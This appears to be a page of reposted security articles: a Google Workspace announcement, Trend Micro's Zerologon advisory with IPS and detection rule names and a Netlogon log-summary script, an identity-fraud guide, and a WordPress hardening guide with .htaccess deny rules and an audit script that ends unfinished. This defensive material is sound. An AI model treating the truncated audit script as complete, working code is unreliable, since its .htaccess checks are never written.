Simplicity, helpfulness, flexibility—these guiding principles apply both to the way people experience our products and to the way we do business. All of our customers share a need for transformative solutions—whether to power remote work, support frontline workers, create immersive digital experiences for their own customers, or all of the above—but their storage, management, and security and compliance needs often vary greatly. 

In order to provide more choice and help customers get the most out of Google Workspace, we are evolving our editions to provide more tailored offerings. Our new editions for smaller businesses are aimed at those often looking to make fast, self-serviced purchases. Our editions for larger enterprises are designed to help organizations that have more complex implementation needs and often require technical assistance over the course of a longer buying and deployment cycle. 

You can learn more about these new offerings on our pricing page. And existing customers can read more here.

Empowering our customers and partners

You, our customers and our users, are our inspiration as we work together to navigate the change ahead. This is an incredibly challenging time, but we believe it’s also the beginning of a new approach to working together. One that is more productive, collaborative, and impactful.

Google Workspace embodies our vision for a future where work is more flexible, time is more precious, and enabling stronger human connections becomes even more important. It’s a vision we’ve been building toward for more than a decade, and one we’re excited to bring to life together with you.

Source :
https://cloud.google.com/blog/products/workspace/introducing-google-workspace

“Zerologon” Understanding the Issues and Applying Solutions

A new CVE was released recently that has made quite a few headlines – CVE-2020-1472. Zerologon, as it’s called, may allow an attacker to take advantage of the cryptographic algorithm used in the Netlogon authentication process and impersonate the identity of any computer when trying to authenticate against the domain controller.

To put that more simply, this vulnerability in the Netlogon Remote Protocol (MS-NRPC) could allow attackers to run their applications on a device on the network. An unauthenticated attacker would use MS-NRPC to connect to a Domain Controller (DC) to obtain administrative access.

According to Dustin Childs with Trend Micro’s Zero Day Initiative (ZDI), “What’s worse is that there is not a full fix available. This patch enables the DCs to protect devices, but a second patch currently slated for Q1 2021 enforces secure Remote Procedure Call (RPC) with Netlogon to fully address this bug. After applying this patch, you’ll still need to make changes to your DC. Microsoft published guidelines to help administrators choose the correct settings.”

But if there’s a patch, why is this a big deal?
You might be thinking, “Well if there’s a patch, this really isn’t an issue.” But the idea of “just patch it” is not as easy as it sounds – check out this post (also from Dustin with the ZDI) for more insights on barriers to patching.

The average Mean Time to Patch (MTTP) is 60 to 150 days. This CVE was published in early August, so that would put the average time for implementing this patch between October 2020 and January 2021.

You may have heard the security industry joke that after Patch Tuesday comes Exploit Wednesday. That’s the comedic way of saying that after Microsoft and Adobe release a batch of patches for new CVEs on the second Tuesday of every month, attackers get to work reverse engineering the patches to write exploits that take advantage of the bugs before the patches have been applied.

Given the MTTP, that’s 2-5 months that your organization is left exposed to a known threat.

So what can I do to protect my organization?
Fortunately, there are advanced protections available for organizations to stay protected, including virtual patching. This provides an extra layer of security to help protect against vulnerabilities before you apply the official vendor patch. As the name suggests, it’s very similar to a patch: it is specifically designed to protect your environment with intrusion prevention system (IPS) capabilities in case someone attempts to exploit that vulnerability. In general, virtual patches can be a critical safety net that allows you to patch in the way that works for your organization.


With Trend Micro, our virtual patching technology helps you mitigate attacks focused on thousands of vulnerabilities, giving you the flexibility to patch regularly without breaking your operational processes for every emergency patch. Other features, such as log inspection, also help you get valuable insight into post-patch exploitation attempts on your network even after you have fully patched. To learn more about Trend Micro protection for CVE-2020-1472, read our knowledge base article here.

On September 11, 2020, detailed technical information was made public regarding a critical Microsoft Windows vulnerability (CVSS 10) that was included in Microsoft’s August 2020 Patch Tuesday set of updates and appears to affect all currently supported Windows Server (2008 R2 and above).

When originally disclosed in August, the vulnerability was given the official designation of CVE-2020-1472, but not much detail on the vulnerability itself was made public.

However, we know that this vulnerability, now dubbed “Zerologon,” may allow an attacker to take advantage of the cryptographic algorithm used in the Netlogon authentication process and impersonate the identity of any computer when trying to authenticate against the domain controller. From there, a variety of other attacks, including but not limited to disabling security features, changing passwords, and essentially taking over the domain are possible.

The entire attack, as demonstrated, is very fast and can be executed in approximately 3 seconds, so it could be very dangerous. In addition, Trend Micro is now aware of weaponized proof-of-concept code that has been made publicly available, meaning that real exploits could be close behind.
DETAILS
Mitigation and Protection

First and foremost, the primary protection against this vulnerability is to ensure that all affected systems are patched with Microsoft’s latest security update. This continues to be the primary recommendation for protection against any exploit that may arise from this vulnerability.

According to the research, there is one serious limitation to exploits of this vulnerability: specifically, it cannot be exploited remotely. An attacker will first need to gain access to the network domain via other means (legitimately or not). So one major mitigation point would be to ensure that network access (both physical and remote) is carefully guarded. However, if an attacker has obtained access to a network via another vulnerability or legitimately, this could become a powerful exploit.

Trend Micro Protection

To assist customers, Trend Micro has created and released some additional layers of protection in the form of Deep Security and Cloud One – Workload Security IPS rules and TippingPoint filters that may help organizations strengthen their overall security posture, especially in situations where comprehensive patching may take time or is not feasible.

IPS Rules

Deep Security and Cloud One – Workload Security, Vulnerability Protection and Apex One Vulnerability Protection (iVP)
Rule 1010519 – Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472)
Rule 1010521 – Netlogon Elevation of Privilege Vulnerability Over SMB (CVE-2020-1472)
Rule 1010539 – Identified NTLM Brute Force Attempt (ZeroLogon) (CVE-2020-1472)
Please note that the rules are already set to Prevent.

Worry-Free Business Security Services
Microsoft Windows Netlogon Elevation Of Privilege Vulnerability Over SMB (CVE-2020-1472)
Microsoft Windows Netlogon Elevation Of Privilege Vulnerability (CVE-2020-1472)
TippingPoint
Filter 38166: MS-NRPC: Microsoft Windows Netlogon Zerologon Authentication Bypass Attempt
Filter 38235: MS-NRPC: Microsoft Windows NetrServerAuthenticate Request
Please note that the posture on this filter has been changed to Enable by Default.

Trend Micro TxONE
1137620: RPC Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472)

Other Inspection / Detection Rules

Deep Security Log Inspection
1010541 – Netlogon Elevation Of Privilege Vulnerability (Zerologon) (CVE-2020-1472)
This Log Inspection (LI) rule for Deep Security gives administrators visibility into potential exploit activity. Due to the complexity of this vulnerability, the Log Inspection rule will only log activities against systems that have already applied the Microsoft patch. Administrators who have patched critical servers with Deep Security may find this information useful internally to help accelerate patching of endpoints and non-critical systems if there is evidence of activity in their environment.
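As an added illustration of the kind of visibility a log-inspection rule gives on a patched domain controller (example code written for this page, not Trend Micro's rule logic): the script below summarises, per machine account, the Netlogon System-log events that Microsoft's August 2020 update introduced, 5827/5828 for a vulnerable secure-channel connection that was denied and 5829 for one that was still allowed. Those event IDs come from Microsoft's own guidance rather than from this article; the log lines and their one-line Key=Value layout are constructed.

```python
"""Summarise Netlogon secure-channel events written by a patched domain controller.

Added example, not Trend Micro's rule logic. The event IDs are the ones
Microsoft documents for the August 2020 Netlogon update (System log,
source NETLOGON): 5827/5828 = vulnerable connection denied, 5829 =
vulnerable connection allowed. The log lines and the flattened
"Key=Value" layout below are constructed for illustration.
"""
import re
from collections import Counter, defaultdict

# Constructed sample records, one per line, as a log forwarder might emit them.
SAMPLE_LOG = """\
2020-09-14T10:01:03Z DC01 NETLOGON EventID=5829 Account=WS-FINANCE-07$ Domain=CORP Client=10.0.5.17
2020-09-14T10:01:04Z DC01 NETLOGON EventID=5829 Account=WS-FINANCE-07$ Domain=CORP Client=10.0.5.17
2020-09-14T10:01:09Z DC01 NETLOGON EventID=5827 Account=OLD-APP-SRV$ Domain=CORP Client=10.0.9.250
2020-09-14T10:02:11Z DC01 NETLOGON EventID=5805 Account=LAPTOP-22$ Domain=CORP Client=10.0.7.44
2020-09-14T10:02:40Z DC01 NETLOGON EventID=5829 Account=PRINT-SRV$ Domain=CORP Client=10.0.3.9
2020-09-14T10:03:02Z DC01 NETLOGON EventID=5828 Account=CORP-TRUST$ Domain=PARTNER Client=172.16.4.2
garbage line that does not match the format
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+NETLOGON\s+EventID=(?P<eid>\d+)\s+"
    r"Account=(?P<acct>\S+)\s+Domain=(?P<dom>\S+)\s+Client=(?P<client>\S+)$"
)

DENIED = {5827, 5828}   # vulnerable secure-channel attempt refused by the DC
ALLOWED = {5829}        # vulnerable attempt logged but still permitted


def parse_netlogon_events(text):
    """Return a list of dicts for lines matching the assumed layout; skip the rest."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["eid"] = int(rec["eid"])
            events.append(rec)
    return events


def summarise(text):
    """Count allowed/denied vulnerable connections per account and note client IPs."""
    allowed, denied = Counter(), Counter()
    clients = defaultdict(set)
    for ev in parse_netlogon_events(text):
        if ev["eid"] in ALLOWED:
            allowed[ev["acct"]] += 1
        elif ev["eid"] in DENIED:
            denied[ev["acct"]] += 1
        else:
            continue   # other Netlogon events are not relevant here
        clients[ev["acct"]].add(ev["client"])
    return {"allowed": allowed, "denied": denied, "clients": dict(clients)}


def accounts_needing_attention(text):
    """Accounts still using the insecure channel: patch or fix them before enforcement."""
    s = summarise(text)
    return sorted(set(s["allowed"]) | set(s["denied"]))


if __name__ == "__main__":
    s = summarise(SAMPLE_LOG)
    for acct in accounts_needing_attention(SAMPLE_LOG):
        print(f"{acct:18} allowed={s['allowed'][acct]:2} denied={s['denied'][acct]:2} "
              f"from {', '.join(sorted(s['clients'][acct]))}")
```

The point of the per-account view is the same one the Log Inspection rule serves: a 5829 on a patched controller tells you which endpoints still negotiate the insecure channel and therefore which systems to patch next.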

Deep Discovery Inspector
Rule 4453: CVE-2020-1472_DCE_RPC_ZEROLOGON_EXPLOIT_REQUEST
Rule 4455: CVE-2020-1472_SMB2_ZEROLOGON_EXPLOIT_REQUEST

Trend Micro is continuing to aggressively look into other forms of detection and protection to assist our customers, but we do want to continue to reiterate that the primary recommendation is to apply the official Microsoft patches as soon as possible. We will continue to update this article and our customers if/when additional layers of protection are found.

References
Trend Micro Blog: “Zerologon” and the Value of Virtual Patching – https://www.trendmicro.com/en_us/research/20/i/zerologon-and-value-of-virtual-patching.html
Trend Micro Video (Youtube) – Cloud One – Workload Security about Zerologon
Microsoft Advisory – https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472

Source :

https://www.trendmicro.com/en_us/research/20/i/zerologon-and-value-of-virtual-patching.html

https://success.trendmicro.com/solution/000270328?_ga=2.197085612.1262457598.1602397006-1044924476.1597417197

Identity Fraud: How to Protect Your Identity Data, Accounts and Money During the Coronavirus Crisis

We’ve all been spending more of our time online since the crisis hit. Whether it’s ordering food for delivery, livestreaming concerts, holding virtual parties, or engaging in a little retail therapy, the digital interactions of many Americans are on the rise. This means we’re also sharing more of our personal and financial information online, with each other and the organizations we interact with. Unfortunately, as ever, there are bad guys around every digital corner looking for a piece of the action.

The bottom line is that personally identifiable information (PII) is the currency of internet crime. And cyber-criminals will do whatever they can to get their hands on it. When they commit identity theft with this data, it can be a messy business, potentially taking months for banks and businesses to investigate before you get your money and credit rating back. At a time of extreme financial hardship, this is the last thing anyone needs.

It therefore pays to be careful about how you use your data and how you protect it. Even more: it’s time to get proactive and monitor it—to try and spot early on if it has been stolen. Here’s what you need to know to protect your identity data.

How identity theft works

First, some data on the scope of the problem. In the second quarter of 2020 alone, 349,641 identity theft reports were filed with the FTC. To put that in perspective, it’s over half of the number for the whole of 2019 (650,572), when consumers reported losing more than $1.9 billion to fraud. What’s driving this huge industry? A cybercrime economy estimated to be worth as much as $1.5 trillion annually.

Specialized online marketplaces and private forums provide a user-friendly way for cyber-criminals and fraudsters to easily buy and sell stolen identity data. Many are on the so-called dark web, which is hidden from search engines and requires a specialized anonymizing browser like Tor to access. However, plenty of this criminal activity also happens in plain sight, on social media sites and messaging platforms. This underground industry is an unstoppable force: as avenues are closed down by law enforcement or criminal in-fighting, other ones appear.

At-risk personal data could be anything from email and account log-ins to medical info, SSNs, card and bank details, insurance details and much more. It all has a value on the cybercrime underground and the price fraudsters are prepared to pay will depend on supply and demand, just like in the ‘real’ world.

There are various ways for attackers to get your data. The main ones are:

  1. Phishing: usually aimed at stealing your log-ins or tricking you into downloading keylogging or other info-stealing malware. Phishing mainly happens via email but could also occur via web, text, or phone. Around $667m was lost in imposter scams last year, according to the FTC.
  2. Malicious mobile apps disguised as legitimate software.
  3. Eavesdropping on social media: if you overshare even innocuous personal data (pet names, birth dates, etc.), it could be used by fraudsters to access your accounts.
  4. Public Wi-Fi eavesdropping: if you’re using it, the bad guys may be too.
  5. Dumpster diving and shoulder surfing: sometimes the old ways are still popular.
  6. Stealing devices or finding lost/misplaced devices in public places.
  7. Attacking the organizations you interact with: unfortunately this is somewhat out of your control, but it’s no less serious. There were 1,473 reported corporate breaches in 2019, up 17% year-on-year.
  8. Harvesting card details covertly from the sites you shop with. Incidents involving this kind of “web skimming” increased 26% in March as more users flocked to e-commerce sites during lockdown.

The COVID-19 challenge

As if this weren’t enough, consumers are especially exposed to risk during the current pandemic. Hackers are using the COVID-19 threat as a lure to infect your PC or steal identity data via the phishing tactics described above. They often impersonate trustworthy institutions/officials and emails may claim to include new information on outbreaks, or vaccines. Clicking through or divulging your personal info will land you in trouble. Other fraud attempts will try to sell counterfeit or non-existent medical or other products to help combat infection, harvesting your card details in the process. In March, Interpol seized 34,000 counterfeit COVID goods like surgical masks and $14m worth of potentially dangerous pharmaceuticals.

Phone-based attacks are also on the rise, especially those impersonating government officials. The aim here is to steal your identity data and apply for government emergency stimulus funds in your name. Of the 349,641 identity theft reports filed with the FTC in Q2 2020, 77,684 were specific to government documents or benefits fraud.

What do cybercriminals do with my identity data?

Once your PII is stolen, it’s typically sold on the dark web to those who use it for malicious purposes. It could be used to:

  1. Crack open other accounts that share the same log-ins (via credential stuffing). There were 30 billion such attempts in 2018.
  2. Log in to your online bank accounts to drain them of funds.
  3. Open bank accounts/credit lines in your name (this can affect your credit rating).
  4. Order phones in your name or port your SIM to a new device (this impacts 7,000 Verizon customers per month).
  5. Purchase expensive items in your name, such as a new watch or television, for criminal resale. This is often done by hijacking your online accounts with e-tailers. E-commerce fraud is said to be worth around $12 billion per year.
  6. File fraudulent tax returns to collect refunds on your behalf.
  7. Claim medical care using your insurance details.
  8. Potentially crack work accounts to attack your employer.

How do I protect my identity online?

The good news among all this bad is that if you remain skeptical about what you see online, are cautious about what you share, and follow some other simple rules, you’ll stand a greater chance of keeping your PII under lock and key. Best practices include:

  1. Use strong, long and unique passwords for all accounts, managed with a password manager.
  2. Enable two-factor authentication (2FA) on all accounts that support it.
  3. Don’t overshare on social media.
  4. Freeze your credit immediately if you suspect your data has been misused.
  5. Remember that if something looks too good to be true online, it usually is.
  6. Don’t use public Wi-Fi when out and about, especially not for sensitive log-ins, without a VPN.
  7. Change your password immediately if a provider tells you your data may have been breached.
  8. Only visit, and only enter payment details into, HTTPS sites.
  9. Don’t click on links or open attachments in unsolicited emails.
  10. Only download apps from official app stores.
  11. Invest in AV from a reputable vendor for all your desktop and mobile devices.
  12. Ensure all operating systems and applications are on the latest version (i.e., patch frequently).
  13. Keep an eye on your bank account/credit card for any unusual spending activity.
  14. Consider investing in a service to monitor the dark web for your personal data.

How Trend Micro can help

Trend Micro offers solutions that can help to protect your digital identity.

Trend Micro ID Security is the best way to get proactive about data protection. It works 24/7 to monitor dark web sites for your PII and will sound the alarm immediately if it finds any sign your accounts or personal data have been stolen. It features:

  1. Dark Web Personal Data Manager scours underground sites and alerts you if it finds personal info like bank account numbers, driver’s license numbers, SSNs and passport information.
  2. Credit Card Checker does the same as the above but for your credit card information.
  3. Email Checker alerts you if any email accounts have been compromised and end up for sale on the dark web, allowing you to immediately change the password.
  4. Password Checker tells you if any passwords you’re using have appeared for sale on the dark web, enabling you to improve password security.

Trend Micro Password Manager enables you to manage all your website and app log-ins from one secure location. Because Password Manager remembers and recalls your credentials on-demand, you can create long, strong and unique passwords for each account. As you’re not sharing easy-to-remember passwords across multiple accounts, you’ll be protected from popular credential stuffing and similar attacks.

Finally, Trend Micro WiFi Protection will protect you if you’re out and about connecting to WiFi hotspots. It automatically detects when a WiFi connection isn’t secure and enables a VPN—making your connection safer and helping keep your identity data private.

In short, it’s time to take an active part in protecting your personal identity data—as if your digital life depended on it. In large part, it does.

Source :
https://blog.trendmicro.com/identity-fraud-how-to-protect-your-identity-data-accounts-and-money-during-the-coronavirus-crisis/

WordPress Security Guide: 14 Actionable Tips to Harden WordPress

If you have a website running on WordPress then ensuring its security should be your foremost concern. But before you even begin to harden WordPress, you should first know…

Why is WordPress Security Important?

  1. WordPress accounted for 90% of all hacked sites that were fixed by Sucuri in 2018 as per this report.
  2. WordPress sets the default username to Admin which is child’s play to guess for anyone.
  3. WordPress reveals the username in the author slug by default.
  4. An intruder can access your site’s database tables, which by default use the wp_ prefix and can be guessed easily unless modified.
  5. Your site is vulnerable to DoS (denial of service) attacks which can result in prolonged downtime.
  6. A hacker can inject malicious code in your website’s database without your knowledge.
  7. And many more reasons as revealed by this WordPress security infographic.

This WordPress Security guide provides only the most useful tips for securing and hardening your WordPress site that you can implement right away, leaving you with ample time to focus on other important aspects of your website.

So let’s start.

WordPress Security Checklist

1. Keep a Strong Password that is Hard to Crack

When you install WordPress on your site for the first time, you have to fill in the password among other details. An easy to crack password is the simplest way a hacker can gain access to your website. So what’s the solution?

Make sure you set a strong password containing a combination of uppercase and lowercase letters, special characters and numbers that cannot be guessed. Please don’t keep a hacker-friendly password like “your name” or “password”.

The second tip is that you should never disclose your site password to anyone. If you have to provide your login details for support purposes to some 3rd party, make sure to change your password once the support issue is resolved.

2. Keep a Username that Cannot be Guessed

By default, WordPress sets the username to ‘admin’ at the time of installation. Nothing could be easier to guess than this. So please make sure to set a hard-to-guess username when you install WordPress.

But this is just the first step.

The second step is to hide your username from the site visitors since WordPress reveals your username in the author profile.

So head over to Admin menu > Users > Your Profile and change your Nickname from your admin username to something different, most probably your real name, and then select your newly created Nickname from the ‘Display name publicly as’ dropdown.

3. Change the Author Slug to Hide Your Username

But even after you change the author nickname, WordPress reveals your real username in the author ‘slug’ or URL whenever anyone hovers over the author name. So, you should hide your real username in the author ‘slug’.

But how do you hide your username in the author slug or URL? There are two easy ways to do this.

The first method is by using a free plugin like Edit Author Slug.

Or if you’re like me and would rather do it manually rather than installing a plugin, then the second method is the best solution and hardly takes 5 minutes to implement.

Head over to phpMyAdmin in your cPanel (hopefully your web host allows access to the MySQL database). Once inside the phpMyAdmin panel, scroll the left menu to the wp_users table (replace ‘wp’ with your database table prefix).

You will see your login details here. You should change the user_nicename from your actual username to something different and then save the changes. That’s it; your real username will no longer be displayed on your author slug.

4. Setup 2-Factor Authentication for Login

Want to ensure fool-proof login security? Then consider setting up 2-factor authentication (2FA) for your login page. This way no intruder can gain access to your site even if he manages to crack your password.

Now, you should know that different types of 2FA are available like SMS based or app-based. For the purpose of this step, we will use an app-based 2FA for securing the WordPress login page.

First, install the Google Authenticator plugin on your site. Of course, you must have the Google Authenticator app installed on your phone. If you have not already installed it, do it before proceeding to the next step.

Now in the settings page of the plugin, click on the Configure button under the Google Authenticator tab. It will ask you to first create a miniOrange account (the plugin’s creator), which takes about 10 seconds. Now onto the next step.

Then scan the QR code using the Google Authenticator app on your mobile. Notice that you can also use the LastPass Authenticator here if you prefer that app.

Finally, just enter the one time code and you are all set. But don’t forget to tick the “Enable 2FA prompt on the WP Login Page” checkbox.

Now when you log in to your site the next time, you will see an additional 2FA prompt below the email and password boxes like this.

5. Secure your .htaccess File for First Line of Defence

The .htaccess file is an Apache Web Server file that enables basic redirects and is also useful for enhancing your website security.

It is a good first line of defence for securing your website.

Your .htaccess file can secure your website by:

  1. Restricting access to important files and folders
  2. Disabling directory browsing
  3. Allowing only specific IPs to access the Admin area
  4. Disabling access to XML-RPC File
  5. Blocking author scans

Now let’s start adding the code snippets for each of the above steps. Remember, you need to add the snippets listed in the following steps to your .htaccess file outside the # BEGIN WordPress and # END WordPress markers, since WordPress rewrites everything between them.

1. Restrict access to important files and folders

You should restrict access to important files such as wp-config.php, php.ini and .htaccess itself since no one but yourself should have a concern with these files. Just add the following snippet to restrict access.

# Block wp-config, php.ini and .htaccess
# (Order/Deny is Apache 2.2 syntax; on Apache 2.4 without mod_access_compat use "Require all denied" instead)
<FilesMatch "^.*(error_log|wp-config\.php|php\.ini|\.[hH][tT][aApP].*)$">
Order deny,allow
Deny from all
</FilesMatch>

Next, you should disable access to the wp-includes folder since this folder contains files that are required to run the WordPress core minus the plugins and themes. So why should anyone snoop around in this folder?

# Block wp-includes folder and files
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^wp-admin/includes/ - [F,L]
RewriteRule !^wp-includes/ - [S=3]
RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]
RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]
RewriteRule ^wp-includes/theme-compat/ - [F,L]
</IfModule>

2. Disable directory browsing

What’s easier to break into for a thief, a home whose floor plan is known or one whose plan is unknown? Similarly, if your site’s file and directory structure is visible, it will be easier for hackers to break into your site.

To prevent this, you should disable directory browsing by adding the following code.

Options -Indexes

3. Allow only specific IPs to access the Admin area

If you’re running a single author blog and access your site from known IPs, then you can only allow these known IPs to access the WordPress admin area by inserting the following snippet.

# Intended for a .htaccess file inside wp-admin/; placed in the site root it would lock every visitor out of the whole site
AuthUserFile /dev/null
AuthGroupFile /dev/null
AuthName "WordPress Admin Access Control"
AuthType Basic
<LIMIT GET>
order deny,allow
deny from all
# whitelist Syed's IP address
allow from xx.xx.xx.xxx
# whitelist David's IP address
allow from xx.xx.xx.xxx
</LIMIT>

Remember to replace the xx in the snippet above with your IP. If you access your site from multiple IPs, add one ‘allow from’ line per IP.

4. Disable access to XML-RPC File

The XML-RPC file enables 3rd party application access to your website. If you’re not giving access to any 3rd party app, it’s advisable to disable access to the XML-RPC file since it could be used by hackers to gain backdoor entry to your site.

Just add the following code in the .htaccess file to do this.

# Block WordPress xmlrpc.php requests
<Files xmlrpc.php>
order deny,allow
deny from all
</Files>

5. Block author scans

Another way hackers can gain entry to your WordPress site is by scanning all the usernames used on your site and then trying to crack your admin password with those usernames. This is typical of a brute force attack.

To prevent anyone from fishing for usernames, you should block author scans by adding the following snippet in the .htaccess file.

# BEGIN block author scans
RewriteEngine On
RewriteBase /
RewriteCond %{QUERY_STRING} (author=\d+) [NC]
RewriteRule .* - [F]
# END block author scans 

6. Use a Security Plugin for All-round Protection

A good security plugin is essential to enhance your WordPress site’s security. There are many plugins available to boost your site’s security but some of the better ones include All-In-One WP Security & Firewall (which I use and recommend), BulletProof Security and iThemes Security.

Why I Recommend the All-in-One WP Security and Firewall Plugin

The free All-In-One WP Security & Firewall plugin has very useful features, including:

  1. It checks whether you have changed the default ‘admin’ username or not. It also checks your password strength using a Password Strength Tool.
  2. It has many user login options, including options for preventing rogue sign-ins and site lockout features.
  3. If you allow user registration, you can implement captcha on the registration and login pages.
  4. Checks whether you still use the default wp_ prefix for your database tables and provides the option to change the database prefix.
  5. Enables automated backups of your database.
  6. Has multiple file security options, including setting the default file permissions, disabling PHP file editing within the dashboard, etc.
  7. You can ban multiple users by IPs or user agents.
  8. Has advanced firewall rules to completely secure your WordPress site.
  9. Prevents brute force attacks by using advanced options.
  10. Prevents comment spam by deploying captcha on the comment form and blocking comment spambots.
  11. A WordPress scanner to detect changes in files.
  12. And many more features.

7. Protect Your Site from DDoS Attacks

If you’re running a popular WordPress website with high traffic, your site could be vulnerable to DDoS (Distributed Denial of Service) attacks that can result in unscheduled downtime and loss of revenue.

There are multiple ways to prevent such an attack from occurring. The first is at the server or hosting level. Your hosting company could offer DoS attack protection. If you haven’t decided on your web host yet, you can consider WPX Hosting, which offers comprehensive website security for free.

The second method is to use a free CDN like Cloudflare that offers free DoS mitigation plans at the entry-level which are good enough for sites with moderate traffic.

8. Make Regular Backups for Unforeseen Situations

In the event of any disruption on your site, you could lose all your hard work, including your posts. To prevent such an extreme event from occurring, it is always advisable to maintain regular backups of your WordPress site.

Again, there are two ways to do this.

The first method is to find a web host that offers free daily backups. If you’re using managed WordPress hosting, chances are your web host already offers free daily backups. Even if not, you can check out with your host regarding this must-have feature.

The second method is to use a free plugin like UpdraftPlus that allows you to schedule daily automatic backups directly to Dropbox, Google Drive, Amazon S3 etc.

9. Use SSL to Encrypt the Connection between Your Site and Users

Secure Sockets Layer (SSL) encrypts the information between your web host server and the visitors’ browser, preventing sensitive information such as their payment credentials from leaking to curious eavesdroppers.

Apart from the security aspect, SSL is also a ranking factor in Google’s search results and you would do well to implement it on your site. That’s why I recommend implementing SSL on your website. You can also get free SSL from some web hosts. Read on to know more.

10. Use Secure Hosting to Fortify Your Site

You may have taken the utmost care to secure your WordPress site, but what if your web server is prone to malicious attacks? There isn’t much you can do in this case.

But what you can and should do is to choose a web host that provides the maximum security to your websites. What kind of security am I talking about?

Well, the most important security feature your web host can provide is free malware scanning. After all, malware removal can cost an arm and a leg once your site is hit by malware.

Fortunately, help is at hand.

We use WPX Hosting for hosting all our websites since they provide the following three crucial features for securing our websites, absolutely free of cost:

  1. Free malware scanning and removal
  2. Free SSL certificate for all our sites
  3. Free daily backups

I also have to add that WPX Hosting provides free cloud-based CDN (content delivery network) and a managed WordPress hosting support experience that I absolutely love.

11. Change the Database Table Prefix to Deter Hackers

Your WordPress database is vulnerable to SQL injection if a hacker can get his hands on it. You cannot completely secure your WordPress database, but you sure can make it difficult for hackers to find your database tables by changing their default prefix from “wp_” to something difficult to guess.

The easiest way to change your database table prefix is by using the terrific (and free) security plugin All-in-One WP Security and Firewall.

12. Update Your Plugins and Themes to Prevent Backdoor Access

Plugins are arguably the primary reason to use WordPress over any other CMS. They extend WordPress capabilities in a limitless manner. But they are also a source of malicious code which could play havoc with your website.

To avoid this possibility, make sure you install only legitimate plugins on your site and avoid any hacked or nulled plugin like the plague, since the person who nulled the plugin could also have embedded malware in it that you would never suspect.

Also, make sure to install the latest version of the plugin since these usually contain many bug fixes. If the plugin hasn’t been updated in a long time, it may be wiser to switch to an alternative.

Speaking of the latest version, make sure to…

13. Enable Auto Updates for Plugins and Themes

If you use many plugins, there may be frequent updates, and updating these plugins will in itself become a chore for you. One easy fix for this is to use the Jetpack plugin by Automattic (the creators of WordPress).

Jetpack has this wonderful option to enable auto-updates for all plugins that you install from WordPress.org repository. Remember, you will still need to update any 3rd party plugin manually.

But I am assuming that the bulk of your plugins will be free plugins installed from WordPress.org and you can enable auto-updates for all of these.

The second method is even better since you can auto-update not just your plugins but also themes and even the major versions of WordPress. However, you should not use this if there is a possibility of the updates breaking your site.

Insert the define() line below in the wp-config.php file, which is located in your WordPress root directory (often public_html). The two add_filter() lines belong in a small plugin or your theme’s functions.php, because add_filter() is not defined yet at the point where wp-config.php is read.

// wp-config.php: let WordPress core update itself automatically
define('WP_AUTO_UPDATE_CORE', true);

// The two filters below belong in a plugin or your theme's functions.php, not in
// wp-config.php: add_filter() is not defined yet when wp-config.php is read.
add_filter( 'auto_update_plugin', '__return_true' );
add_filter( 'auto_update_theme', '__return_true' );

14. Disable the Theme and Plugin Editor

You should also consider disabling access to the theme and plugin editor within your WordPress admin dashboard as an added security measure, to prevent users with admin access from tinkering with your theme and plugin files.

Just add the following single line of code in the wp-config.php file.

define('DISALLOW_FILE_EDIT', true);
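To check several of the tips above from the files themselves (tip 5’s .htaccess directives, tip 11’s table prefix, tip 13’s auto-update constant and tip 14’s DISALLOW_FILE_EDIT), here is an added audit script; it is not part of this guide or of WordPress. The weak and hardened wp-config.php and .htaccess samples are constructed, the constant and directive names are the ones used in the guide, and the check for add_filter() inside wp-config.php flags a placement that would make WordPress fail to load.

```python
"""Audit a WordPress site's wp-config.php and .htaccess against several tips
of the guide (5: .htaccess hardening, 11: table prefix, 13: auto-updates,
14: file editor). Added example, not part of the guide or of WordPress;
the weak and hardened sample files below are constructed.
"""
import re

WEAK_WP_CONFIG = """<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpuser' );
$table_prefix = 'wp_';
require_once ABSPATH . 'wp-settings.php';
"""

HARDENED_WP_CONFIG = """<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpuser' );
$table_prefix = 'k9qz_';
define('WP_AUTO_UPDATE_CORE', true);
define('DISALLOW_FILE_EDIT', true);
require_once ABSPATH . 'wp-settings.php';
"""

WEAK_HTACCESS = r"""# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^index\.php$ - [L]
</IfModule>
# END WordPress
"""

HARDENED_HTACCESS = r"""Options -Indexes
<FilesMatch "^.*(error_log|wp-config\.php|php\.ini|\.[hH][tT][aApP].*)$">
Order deny,allow
Deny from all
</FilesMatch>
<Files xmlrpc.php>
order deny,allow
deny from all
</Files>
RewriteEngine On
RewriteCond %{QUERY_STRING} (author=\d+) [NC]
RewriteRule .* - [F]
""" + WEAK_HTACCESS

# define('NAME', value) with a literal bool, int or quoted string value
DEFINE_RE = re.compile(
    r"define\(\s*['\"](\w+)['\"]\s*,\s*(true|false|-?\d+|'[^']*'|\"[^\"]*\")\s*\)", re.I)


def parse_defines(php):
    """Map define('NAME', value) calls to Python values (bool, int or str)."""
    out = {}
    for name, raw in DEFINE_RE.findall(php):
        low = raw.lower()
        if low in ("true", "false"):
            out[name] = low == "true"
        elif raw[0] in "'\"":
            out[name] = raw[1:-1]
        else:
            out[name] = int(raw)
    return out


def table_prefix(php):
    m = re.search(r"\$table_prefix\s*=\s*['\"]([^'\"]*)['\"]", php)
    return m.group(1) if m else None


def audit_wp_config(php):
    findings = []
    if table_prefix(php) == "wp_":
        findings.append("tip 11: default table prefix wp_ still in use")
    d = parse_defines(php)
    if d.get("DISALLOW_FILE_EDIT") is not True:
        findings.append("tip 14: theme/plugin editor not disabled (DISALLOW_FILE_EDIT)")
    if d.get("WP_AUTO_UPDATE_CORE") is not True:
        findings.append("tip 13: core auto-updates not enabled (WP_AUTO_UPDATE_CORE)")
    if re.search(r"\badd_filter\s*\(", php):
        findings.append("add_filter() in wp-config.php runs before WordPress defines it; move it to a plugin")
    return findings


def _directives(htaccess):
    """Drop comment lines so a commented-out directive does not count as present."""
    return "\n".join(l for l in htaccess.splitlines() if not l.lstrip().startswith("#"))


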